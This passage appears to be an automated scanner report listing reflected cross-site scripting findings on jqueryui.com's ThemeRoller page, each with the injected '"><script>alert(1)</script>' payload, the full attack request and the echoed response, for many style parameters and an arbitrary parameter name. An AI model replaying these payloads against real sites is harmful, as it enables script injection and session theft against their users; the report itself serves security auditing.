GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636cf963"><script>alert(1)</script>72faaf79734&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d5c"><script>alert(1)</script>421aee9aa0f was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121c9d5c"><script>alert(1)</script>421aee9aa0f&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:03:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ec5"><script>alert(1)</script>90d72c19db1 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serifd3ec5"><script>alert(1)</script>90d72c19db1&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ae8b"><script>alert(1)</script>06aa04249d4 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em8ae8b"><script>alert(1)</script>06aa04249d4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc66"><script>alert(1)</script>b02328b292f was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal9cc66"><script>alert(1)</script>b02328b292f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120002
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44097"><script>alert(1)</script>a09edf276e3 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=45454544097"><script>alert(1)</script>a09edf276e3&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836c3"><script>alert(1)</script>8b1747e34da was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222836c3"><script>alert(1)</script>8b1747e34da&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:01:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e8a4"><script>alert(1)</script>eb9f889d3a7 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=8888887e8a4"><script>alert(1)</script>eb9f889d3a7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:03:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cff7"><script>alert(1)</script>b21e4745897 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a7cff7"><script>alert(1)</script>b21e4745897&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:06:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d3c3"><script>alert(1)</script>f3869e5e299 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222224d3c3"><script>alert(1)</script>f3869e5e299&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be373"><script>alert(1)</script>882164f26de was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ffbe373"><script>alert(1)</script>882164f26de&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a060e"><script>alert(1)</script>574464c1df9 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545a060e"><script>alert(1)</script>574464c1df9&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:04:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545a060e"><script>alert(1)</script>574464c1df9&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa ...[SNIP]...
4.636. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adba1"><script>alert(1)</script>92436fbe461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?adba1"><script>alert(1)</script>92436fbe461=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 04:51:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c570e"><script>alert(1)</script>afcffadfccf was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&